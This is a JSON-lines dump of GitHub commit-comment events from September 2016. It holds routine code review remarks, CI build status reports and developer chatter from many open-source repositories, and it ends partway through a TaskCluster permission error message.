{"id":"4535530673","type":"CommitCommentEvent","actor":{"login":"MarkMLunarG"},"repo":{"name":"KhronosGroup/Vulkan-LoaderAndValidationLayers"},"payload":{"comment":{"id":18949433,"position":141,"line":14080,"path":"tests/layer_validation_tests.cpp","commit_id":"7dfc26bc43179b0aa7adfd74e97ef6353b7b9600","created_at":"2016-09-08T17:38:00Z","updated_at":"2016-09-08T17:38:00Z","body":"Our farming techniques are a bit primitive for this ag community, it's going to take a bit before I get the results. The test does not need that line to succeed. so the fix is to remove it"}},"created_at":"2016-09-08T17:38:00Z"}
{"id":"4535536417","type":"CommitCommentEvent","actor":{"login":"jkreiser"},"repo":{"name":"jmayalag/realm-recyclerview"},"payload":{"comment":{"id":18949446,"position":5,"line":15,"path":"library/src/main/java/co/moonmonkeylabs/realmrecyclerview/RealmRecyclerView.java","commit_id":"73ac741fdeecc3a414cda188115d5812df8f553e","created_at":"2016-09-08T17:39:06Z","updated_at":"2016-09-08T17:39:06Z","body":"This library's fast scroll recycler view will crash when using `app:rrvLayoutType=\"LinearLayoutWithHeaders\"`, since it tries to cast the layout manager to a `LinearLayoutManager`, and \"LinearLayoutWithHeaders\" uses a `LayoutManager` instead of a `LinearLayoutManager`."}},"created_at":"2016-09-08T17:39:06Z"}
{"id":"4535539125","type":"CommitCommentEvent","actor":{"login":"potomak"},"repo":{"name":"potomak/scotty-format"},"payload":{"comment":{"id":18949458,"position":37,"line":26,"path":"src/Web/Scotty/Format/Trans.hs","commit_id":"49a7f9fd313977ec8cd9d985b6831514a92a6965","created_at":"2016-09-08T17:39:36Z","updated_at":"2016-09-08T17:39:36Z","body":"You're right, I introduced this bug with yesterday's refactor. Good catch."}},"created_at":"2016-09-08T17:39:36Z"}
{"id":"4535542812","type":"CommitCommentEvent","actor":{"login":"domoritz"},"repo":{"name":"vega/vega-lite-ui"},"payload":{"comment":{"id":18949466,"position":null,"line":null,"path":null,"commit_id":"189ab4e09ae803c441fd31b90fb819aa5938d2e0","created_at":"2016-09-08T17:40:19Z","updated_at":"2016-09-08T17:40:19Z","body":"Sweet. "}},"created_at":"2016-09-08T17:40:19Z"}
{"id":"4535543022","type":"CommitCommentEvent","actor":{"login":"nwspeete-ibm"},"repo":{"name":"nwspeete-ibm/openwhisk"},"payload":{"comment":{"id":18949467,"position":1,"line":1,"path":"services/restify/Dockerfile","commit_id":"bb4f2f1dd570f1f706ac1fc6ca2556f96c9ffb9d","created_at":"2016-09-08T17:40:21Z","updated_at":"2016-09-08T17:40:21Z","body":" \nOnce we have a hello world scala webservice to put into the src folder, I think we could open up a WIP for this. Jeremias, Markus, and Hoang will want to be in on the discussion on how to setup the separate playbook that will not impact the pipeline.\n----- Original message -----From: Mark Deuser <notifications@github.com>To: nwspeete-ibm/openwhisk <openwhisk@noreply.github.com>Cc: Nicholas W Speeter/Durham/IBM@IBMUS, Mention <mention@noreply.github.com>Subject: Re: [nwspeete-ibm/openwhisk] Template for services/restify and ansible/roles/restify (bb4f2f1)Date: Thu, Sep 8, 2016 12:30 PM \n@nwspeete-ibm - Is this an older version of this file? In recent files, I am seeing FROM scala...\n—You are receiving this because you were mentioned.Reply to this email directly, view it on GitHub, or mute the thread.\n\n "}},"created_at":"2016-09-08T17:40:21Z"}
{"id":"4535543758","type":"CommitCommentEvent","actor":{"login":"Xyene"},"repo":{"name":"DMOJ/site"},"payload":{"comment":{"id":18949469,"position":4,"line":4,"path":"templates/problem/data.jade","commit_id":"2308932010aee1998e77b3666e4e0c9a0307377e","created_at":"2016-09-08T17:40:29Z","updated_at":"2016-09-08T17:40:29Z","body":"*triggering intensifies*"}},"created_at":"2016-09-08T17:40:29Z"}
{"id":"4535545067","type":"CommitCommentEvent","actor":{"login":"funkyfuture"},"repo":{"name":"nicolaiarocci/cerberus"},"payload":{"comment":{"id":18949472,"position":52,"line":124,"path":"UPGRADING.rst","commit_id":"cd25750d017aa899f7a99b20a75af9260a790b6f","created_at":"2016-09-08T17:40:44Z","updated_at":"2016-09-08T17:40:44Z","body":"mind opening an issue to elaborate there?"}},"created_at":"2016-09-08T17:40:44Z"}
{"id":"4535545344","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18949473,"position":5,"line":107,"path":"application/src/main/webapp/js/desktopNotification.js","commit_id":"73e7712390b7b0e79dd02fbc69c6e24973d599aa","created_at":"2016-09-08T17:40:47Z","updated_at":"2016-09-08T17:40:47Z","body":"No, when there is no keyword, the **keywords** variable will contain \"keywords:\" , so that's why we split with the **:** separator so that we can check on the passed keywords empty or not, you can use the debugger to see it in real time."}},"created_at":"2016-09-08T17:40:47Z"}
{"id":"4535546666","type":"CommitCommentEvent","actor":{"login":"davemackintosh"},"repo":{"name":"cucumber/cucumber-js"},"payload":{"comment":{"id":18949478,"position":null,"line":null,"path":null,"commit_id":"7602273e46d39a6ed25c6d70a4ac6b90913bd522","created_at":"2016-09-08T17:41:03Z","updated_at":"2016-09-08T17:41:03Z","body":"🎉👍🏻"}},"created_at":"2016-09-08T17:41:03Z"}
{"id":"4535555651","type":"CommitCommentEvent","actor":{"login":"jtbandes"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18949508,"position":212,"line":130,"path":"Frameworks/OakAppKit/src/OakPopOutAnimation.mm","commit_id":"dd3ebefe3f60b323af5a6b1e104c04b43da78eeb","created_at":"2016-09-08T17:42:48Z","updated_at":"2016-09-08T17:42:48Z","body":"After closing the window, you could do `[shapeLayer removeAllAnimations]`, perhaps."}},"created_at":"2016-09-08T17:42:48Z"}
{"id":"4535559131","type":"CommitCommentEvent","actor":{"login":"buren"},"repo":{"name":"thoughtbot/administrate"},"payload":{"comment":{"id":18949524,"position":null,"line":null,"path":null,"commit_id":"5227c9bc5b20904155f419409d6c3606763d24a5","created_at":"2016-09-08T17:43:27Z","updated_at":"2016-09-08T17:43:27Z","body":"@graysonwright why is `faker` needed in production on Heroku?  \r\n\r\nThe only references I found were in [spec/example_app/db/seeds.rb](https://github.com/thoughtbot/administrate/blob/e9a713439bbe6ac1bb0263872de85d9b91191a58/spec/example_app/db/seeds.rb#L15,L18).\r\n\r\nAsking since its not a super lightweight dependency:\r\n\r\n```\r\n$ du -sh lib\r\n944K   \tlib\r\n```"}},"created_at":"2016-09-08T17:43:27Z"}
{"id":"4535561193","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949529,"position":53,"line":98,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:43:51Z","updated_at":"2016-09-08T17:43:51Z","body":"I looked up defensive programming. I should make my code easier to read by using variables to keep track of values. I think we've talked about this in different terms i.e. don't chain more than 1 or 2 methods."}},"created_at":"2016-09-08T17:43:51Z"}
{"id":"4535563328","type":"CommitCommentEvent","actor":{"login":"saaguero"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":18949533,"position":37,"line":20,"path":"tests/utils.vader","commit_id":"2c7a28d01cb0bdf8602680314b9f0b8c10bf9f07","created_at":"2016-09-08T17:44:16Z","updated_at":"2016-09-08T17:44:16Z","body":"This is to test that %%.. should not be expanded."}},"created_at":"2016-09-08T17:44:16Z"}
{"id":"4535564602","type":"CommitCommentEvent","actor":{"login":"tarantonio"},"repo":{"name":"peonso/tibialegacyserver"},"payload":{"comment":{"id":18949536,"position":null,"line":null,"path":null,"commit_id":"0c95e62c18f6abd3daf65045383a70d970f42b7c","created_at":"2016-09-08T17:44:29Z","updated_at":"2016-09-08T17:44:29Z","body":"hahah so much time with OTClient, I forgot that tip ;P"}},"created_at":"2016-09-08T17:44:29Z"}
{"id":"4535564685","type":"CommitCommentEvent","actor":{"login":"jacogr"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18949537,"position":18,"line":18,"path":"js/src/dapps/registry/Lookup/lookup.js","commit_id":"7527bfa911918c6edf4acc6aac716e58c7e65d63","created_at":"2016-09-08T17:44:30Z","updated_at":"2016-09-08T17:44:30Z","body":"100%. as long as we use the `() => {}` notation for the handlers (it is the most effective and cleanest way)"}},"created_at":"2016-09-08T17:44:30Z"}
{"id":"4535565329","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18949539,"position":null,"line":null,"path":null,"commit_id":"44a94d22d5e73d470a2383b496c59ac4e941346d","created_at":"2016-09-08T17:44:38Z","updated_at":"2016-09-08T17:44:38Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T17:44:38Z"}
{"id":"4535566724","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18949542,"position":93,"line":138,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-08T17:44:52Z","updated_at":"2016-09-08T17:44:52Z","body":"A note to myself to make sure I understand, I will remove it."}},"created_at":"2016-09-08T17:44:52Z"}
{"id":"4535574353","type":"CommitCommentEvent","actor":{"login":"toolstack"},"repo":{"name":"toolstack/git-to-wp-plugin-dir-release-script"},"payload":{"comment":{"id":18949561,"position":5,"line":38,"path":"class.release.php","commit_id":"13aae838faf6f6b567f3ba3dc46d6fc3a4556ee3","created_at":"2016-09-08T17:46:19Z","updated_at":"2016-09-08T17:46:19Z","body":"?"}},"created_at":"2016-09-08T17:46:19Z"}
{"id":"4535575318","type":"CommitCommentEvent","actor":{"login":"jubianchi"},"repo":{"name":"shulard/atoum-xml-extension"},"payload":{"comment":{"id":18949565,"position":11,"line":110,"path":"classes/asserters/nodes.php","commit_id":"ef0c35c6091aa6f85b27d1bb1ca7e6182f9aafbf","created_at":"2016-09-08T17:46:31Z","updated_at":"2016-09-08T17:46:31Z","body":"let me send you a PR, it will be easier ;)"}},"created_at":"2016-09-08T17:46:31Z"}
{"id":"4535579852","type":"CommitCommentEvent","actor":{"login":"klarkc"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18949583,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T17:47:22Z","updated_at":"2016-09-08T17:47:22Z","body":"As far as I know, Loopback does not use the fs module in the client environment, so this pkginfo is the only module that tries to use fs in client, throwing the error. The thing is, you don't need this module (pkginfo) in your client if it's not being used by loopback, maybe this cause an overhead of modules in your bundle (You said before that your bundle is 100k > lines, my bundle has ~80k of lines).\r\n\r\nI am guessing that, pkginfo is only used by this winston package, that I don't know why is being bundled in the client. Some script is requiring this module in `client/loopback` directory or `common`directory.\r\n\r\nYou have two ways to fix this, use brfs or remove the modules that tries to use fs module."}},"created_at":"2016-09-08T17:47:22Z"}
{"id":"4535580426","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18949585,"position":null,"line":null,"path":null,"commit_id":"44a94d22d5e73d470a2383b496c59ac4e941346d","created_at":"2016-09-08T17:47:28Z","updated_at":"2016-09-08T17:47:28Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T17:47:28Z"}
{"id":"4535580955","type":"CommitCommentEvent","actor":{"login":"Eddie-Hartman"},"repo":{"name":"Eddie-Hartman/alexa-avs-raspberry-pi"},"payload":{"comment":{"id":18949586,"position":null,"line":null,"path":null,"commit_id":"999080e5751aa37abe12c772bce2224679f35c5b","created_at":"2016-09-08T17:47:34Z","updated_at":"2016-09-08T17:47:34Z","body":"That's what this change fixed."}},"created_at":"2016-09-08T17:47:34Z"}
{"id":"4535581138","type":"CommitCommentEvent","actor":{"login":"al-s"},"repo":{"name":"Goles/mopub-ios-sdk"},"payload":{"comment":{"id":18949587,"position":null,"line":null,"path":null,"commit_id":"75cb8ba9a0881094696e069e8d05864d42aa64de","created_at":"2016-09-08T17:47:37Z","updated_at":"2016-09-08T17:47:37Z","body":"vungleSDKAdPlayableChanged handler also should be removed. Otherwise it can call [self.delegate vungleAdDidLoad] after [self.delegate vungleAdDidFailToLoad:nil]. Most likely the delegate doesn't expect such behavior."}},"created_at":"2016-09-08T17:47:37Z"}
{"id":"4535583083","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18949591,"position":null,"line":null,"path":null,"commit_id":"e69cb1e6d2ac453632fc99e262cae20a434cbfcc","created_at":"2016-09-08T17:47:58Z","updated_at":"2016-09-08T17:47:58Z","body":"What happens if there are more than 50 sessions? Is there pagination?"}},"created_at":"2016-09-08T17:47:58Z"}
{"id":"4535583694","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18949594,"position":null,"line":null,"path":null,"commit_id":"44a94d22d5e73d470a2383b496c59ac4e941346d","created_at":"2016-09-08T17:48:05Z","updated_at":"2016-09-08T17:48:05Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T17:48:05Z"}
{"id":"4535603907","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18949656,"position":10,"line":10,"path":"tutorials/13_semestralka.md","commit_id":"114de46ee4336dacbd26d5659f9fea825d78781c","created_at":"2016-09-08T17:51:46Z","updated_at":"2016-09-08T17:51:46Z","body":"s/Pythonu/Pythonu 3/ ?"}},"created_at":"2016-09-08T17:51:46Z"}
{"id":"4535608375","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18949671,"position":28,"line":28,"path":"run.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T17:52:34Z","updated_at":"2016-09-08T17:52:34Z","body":"Presumably we'd need to adopt a similar pattern.  It looks like we already have this abstracted in toolruntime.targets so hopefully it's just a matter of updating this target.  The tricky part is how do we get the FX version.  I know there's some thinking about hard-coding the version and pushing for a proper fix up-stream however when it comes time to actually update the version it will be a lot of work.\r\nI like your idea of creating a hard link to the shared FX; yes it works around an issue that should be addressed up-stream however it centralizes/reduces the place where we have to hard-code the FX version which I think is much more reasonable to absorb."}},"created_at":"2016-09-08T17:52:34Z"}
{"id":"4535611356","type":"CommitCommentEvent","actor":{"login":"licaon-kter"},"repo":{"name":"siacs/Conversations"},"payload":{"comment":{"id":18949678,"position":null,"line":null,"path":null,"commit_id":"e1d2c32e63d6f2276b56600945569dede3e34890","created_at":"2016-09-08T17:53:07Z","updated_at":"2016-09-08T17:53:07Z","body":"At least it's consistent. :)"}},"created_at":"2016-09-08T17:53:07Z"}
{"id":"4535611683","type":"CommitCommentEvent","actor":{"login":"BenDaviesGFX"},"repo":{"name":"BenDaviesGFX/Chaos"},"payload":{"comment":{"id":18949679,"position":null,"line":null,"path":null,"commit_id":"a4e02f0e4812e4408d8d5fa0af282b33ecc2f507","created_at":"2016-09-08T17:53:11Z","updated_at":"2016-09-08T17:53:11Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;UA3r1X6Y&#x2F;6-add-game-state-manager\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add Game State Manager</a>"}},"created_at":"2016-09-08T17:53:11Z"}
{"id":"4535613307","type":"CommitCommentEvent","actor":{"login":"rofirrim"},"repo":{"name":"bsc-pm/mcxx"},"payload":{"comment":{"id":18949686,"position":5,"line":8169,"path":"src/frontend/cxx-scope.c","commit_id":"28750f70f13f629b1b84007342f9da9a55ea84a1","created_at":"2016-09-08T17:53:28Z","updated_at":"2016-09-08T17:53:28Z","body":"I think this is missing a check of is_error_type where a NODECL_ERR_EXPR will have to be returned, like in line 8037 above."}},"created_at":"2016-09-08T17:53:28Z"}
{"id":"4535614621","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18949691,"position":null,"line":null,"path":null,"commit_id":"3c91d9327fd25fc18cd3a3493e0423b884ea71fe","created_at":"2016-09-08T17:53:42Z","updated_at":"2016-09-08T17:53:42Z","body":"I whacked `winpipes.cpp` when I updated `LIB_SRCS` and `LIB_OBJS`."}},"created_at":"2016-09-08T17:53:42Z"}
{"id":"4535614956","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18949695,"position":null,"line":null,"path":null,"commit_id":"44a94d22d5e73d470a2383b496c59ac4e941346d","created_at":"2016-09-08T17:53:46Z","updated_at":"2016-09-08T17:53:46Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-08T17:53:46Z"}
{"id":"4535614992","type":"CommitCommentEvent","actor":{"login":"rofirrim"},"repo":{"name":"bsc-pm/mcxx"},"payload":{"comment":{"id":18949697,"position":13,"line":8177,"path":"src/frontend/cxx-scope.c","commit_id":"28750f70f13f629b1b84007342f9da9a55ea84a1","created_at":"2016-09-08T17:53:46Z","updated_at":"2016-09-08T17:53:46Z","body":"You also want to return a NODECL_ERR_EXPR here as well."}},"created_at":"2016-09-08T17:53:46Z"}
{"id":"4535616244","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":18949701,"position":37,"line":20,"path":"tests/utils.vader","commit_id":"2c7a28d01cb0bdf8602680314b9f0b8c10bf9f07","created_at":"2016-09-08T17:54:00Z","updated_at":"2016-09-08T17:54:00Z","body":"How would you specify `%:h` literally then though?\r\n`\\%:h` would work for that probably?!"}},"created_at":"2016-09-08T17:54:00Z"}
{"id":"4535616322","type":"CommitCommentEvent","actor":{"login":"dewhisna"},"repo":{"name":"dewhisna/Repetier-Firmware"},"payload":{"comment":{"id":18949703,"position":null,"line":null,"path":null,"commit_id":"20fea79dbf4863c0f38f6c9ed1f76682bb9cfb5e","created_at":"2016-09-08T17:54:01Z","updated_at":"2016-09-08T17:54:01Z","body":"How are you compiling it?  I personally use CMake on Linux rather than the Arduino IDE.  But the Arduino IDE should work.  There was, however, a pretty major structural change from the 1.0.x IDE and the newer 1.5.x and 1.6.x versions.  I *think* this project works with both, but since I don't use the IDE itself, I don't know for sure.  So whichever you are using, try the other one to see if it makes a difference.\r\n\r\nMake sure you are in the \"src/BoXZY/BoXZY_firmware\" folder and compiling the \"BoXZY_firmware.ino\" sketch.  The files in the \"src/ArduinoAVR/Repetier\" haven't been updated for the BoXZY nor customized for a particular printer or device.\r\n\r\nWhich LCD are you using?  If you are using the RepRapDiscount Full Graphic 12864 LCD, as I am, you can try using the firmware I already have compiled and posted on the unofficial BoXZY forum here:  http://boxzyunofficial.forumchatter.com/post/firmware-updating-8157753\r\n\r\nIf you are using a different LCD, you'll either need to manually change Configure.h or use the online customizer from Repetier (https://www.repetier.com/firmware/v092/) and merge the thermistor calibration tables and custom BoXZY defines.\r\n"}},"created_at":"2016-09-08T17:54:01Z"}
{"id":"4535623421","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18949731,"position":null,"line":null,"path":null,"commit_id":"64281d26f73412fb4e7881cce6f7af35a42a2932","created_at":"2016-09-08T17:55:23Z","updated_at":"2016-09-08T17:55:23Z","body":"This is opportunistic. As far as I know, (1) there are no outsatnding issues; and (2) `Integer` has an initializer that could run early. Also, `Integer` creates `Integer::One()` and `Integer::Zero()`, so it makes sense to get then created early."}},"created_at":"2016-09-08T17:55:23Z"}
{"id":"4535626414","type":"CommitCommentEvent","actor":{"login":"islemaster"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":18949739,"position":12,"line":129,"path":"SETUP.md","commit_id":"bf5fec500615c5669869064ea8808ecf838aafb9","created_at":"2016-09-08T17:55:57Z","updated_at":"2016-09-08T17:55:57Z","body":"I think most of this comment still applies to the `build_apps` and `use_my_apps` options.  It might be worth rewording this instead of removing it altogether."}},"created_at":"2016-09-08T17:55:57Z"}
{"id":"4535626711","type":"CommitCommentEvent","actor":{"login":"RamyaGS"},"repo":{"name":"RamyaGS/recipes"},"payload":{"comment":{"id":18949740,"position":5,"line":10,"path":"cake-recipe.txt","commit_id":"05417d49c870d3b897a4a168b21861a8078024f2","created_at":"2016-09-08T17:56:01Z","updated_at":"2016-09-08T17:56:01Z","body":"Looks like you spelled Sunflower wrong "}},"created_at":"2016-09-08T17:56:01Z"}
{"id":"4535628311","type":"CommitCommentEvent","actor":{"login":"sivarv"},"repo":{"name":"mikedn/coreclr"},"payload":{"comment":{"id":18949745,"position":null,"line":null,"path":null,"commit_id":"30803e00e1b4e132c74a9d2e55931e394c2a39b5","created_at":"2016-09-08T17:56:20Z","updated_at":"2016-09-08T17:56:20Z","body":"Looks good."}},"created_at":"2016-09-08T17:56:20Z"}
{"id":"4535629140","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18949746,"position":null,"line":null,"path":null,"commit_id":"66dc925f94c15f92d0a2f16a03d8776df33e9144","created_at":"2016-09-08T17:56:29Z","updated_at":"2016-09-08T17:56:29Z","body":"I believe UB asked about testing `config.h` versus `config.recommend`. Its useful since we want to run the battery of tests against both."}},"created_at":"2016-09-08T17:56:29Z"}
{"id":"4535631183","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18949753,"position":null,"line":null,"path":null,"commit_id":"a122e53b6128f3bbd38886419ec53f724bee74f8","created_at":"2016-09-08T17:56:52Z","updated_at":"2016-09-08T17:56:52Z","body":"Merge maintenance."}},"created_at":"2016-09-08T17:56:52Z"}
{"id":"4535632527","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18949760,"position":null,"line":null,"path":null,"commit_id":"be8a9f674281699995b7db08fcd8a51fdb1fce87","created_at":"2016-09-08T17:57:09Z","updated_at":"2016-09-08T17:57:09Z","body":"Merge maintenance."}},"created_at":"2016-09-08T17:57:09Z"}
{"id":"4535634563","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18949765,"position":null,"line":null,"path":null,"commit_id":"c901dae0387b2380ed77040fe3ca3e4109df325e","created_at":"2016-09-08T17:57:31Z","updated_at":"2016-09-08T17:57:31Z","body":"Merge maintenance."}},"created_at":"2016-09-08T17:57:31Z"}
{"id":"4535635150","type":"CommitCommentEvent","actor":{"login":"klarkc"},"repo":{"name":"klarkc/polymer-loopback-starter-kit"},"payload":{"comment":{"id":18949767,"position":null,"line":null,"path":null,"commit_id":"662ac70082b5bb06e44bb8fe1f0f52605a2af2a0","created_at":"2016-09-08T17:57:37Z","updated_at":"2016-09-08T17:57:37Z","body":"Maybe related: winstonjs/winston#287"}},"created_at":"2016-09-08T17:57:37Z"}
{"id":"4535635482","type":"CommitCommentEvent","actor":{"login":"ZeroBoyEU"},"repo":{"name":"ZeroBoyEU/ZeroBOYos"},"payload":{"comment":{"id":18949770,"position":null,"line":null,"path":null,"commit_id":"715b0320a48c36e698cfad1750eb8c61c6a09739","created_at":"2016-09-08T17:57:41Z","updated_at":"2016-09-08T17:57:41Z","body":"Test"}},"created_at":"2016-09-08T17:57:41Z"}
{"id":"4535635505","type":"CommitCommentEvent","actor":{"login":"manland"},"repo":{"name":"team-thirtyfour/js13kgame"},"payload":{"comment":{"id":18949771,"position":28,"line":74,"path":"src/Collision.js","commit_id":"319cbce339f04756b93e97cfe4f06053814e9b39","created_at":"2016-09-08T17:57:42Z","updated_at":"2016-09-08T17:57:42Z","body":"chelou ton eA.wid`ht`"}},"created_at":"2016-09-08T17:57:42Z"}
{"id":"4535636334","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18949772,"position":null,"line":null,"path":null,"commit_id":"01b40aab3167d36e052b61909448c1fdec92ebd9","created_at":"2016-09-08T17:57:51Z","updated_at":"2016-09-08T17:57:51Z","body":"Merge maintenance."}},"created_at":"2016-09-08T17:57:51Z"}
{"id":"4535642387","type":"CommitCommentEvent","actor":{"login":"tongzhuca"},"repo":{"name":"hainingl/gbf"},"payload":{"comment":{"id":18949781,"position":null,"line":null,"path":null,"commit_id":"230b9db59dbf9eaacc7bb90786cf899d8d92bcbf","created_at":"2016-09-08T17:58:55Z","updated_at":"2016-09-08T17:58:55Z","body":"original data could be like \"0136\". ts1.getDouble() will return 136, instead of 0136.\r\n"}},"created_at":"2016-09-08T17:58:55Z"}
{"id":"4535642601","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18949782,"position":null,"line":null,"path":null,"commit_id":"6653d246f470e489e9dd4b3aa1fb07850b3538ec","created_at":"2016-09-08T17:58:58Z","updated_at":"2016-09-08T17:58:58Z","body":"oh crap, this changed the behaviour a bit so tests fail, fixing..."}},"created_at":"2016-09-08T17:58:58Z"}
{"id":"4535643432","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":18949786,"position":314,"line":314,"path":"tutorials/01_requests_click.md","commit_id":"283251ba5b5d450a61373d576efa4dfa3fbf6984","created_at":"2016-09-08T17:59:07Z","updated_at":"2016-09-08T17:59:07Z","body":"Tip na další aplikaci využívající Twitter API: statistiky tweetování k určitému tématu. Mohou se inspirovat [mým skriptem v Ruby](https://gist.github.com/jirutka/bad0977bebf2fa73d543#file-twitter-stats-rb). :P"}},"created_at":"2016-09-08T17:59:07Z"}
{"id":"4535643474","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18949787,"position":null,"line":null,"path":null,"commit_id":"b9cb647be893c2cfc468e2a5c20763799556dab2","created_at":"2016-09-08T17:59:08Z","updated_at":"2016-09-08T17:59:08Z","body":"++"}},"created_at":"2016-09-08T17:59:08Z"}
{"id":"4535647737","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":18949799,"position":null,"line":null,"path":null,"commit_id":"e9c07b25717a33de5159046f9cf512906477532a","created_at":"2016-09-08T17:59:52Z","updated_at":"2016-09-08T17:59:52Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#taskcluster-notifications.on-any\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/taskcluster/taskcluster-github:branch:add-notify-on-build\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#taskcluster-notifications.on-any\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   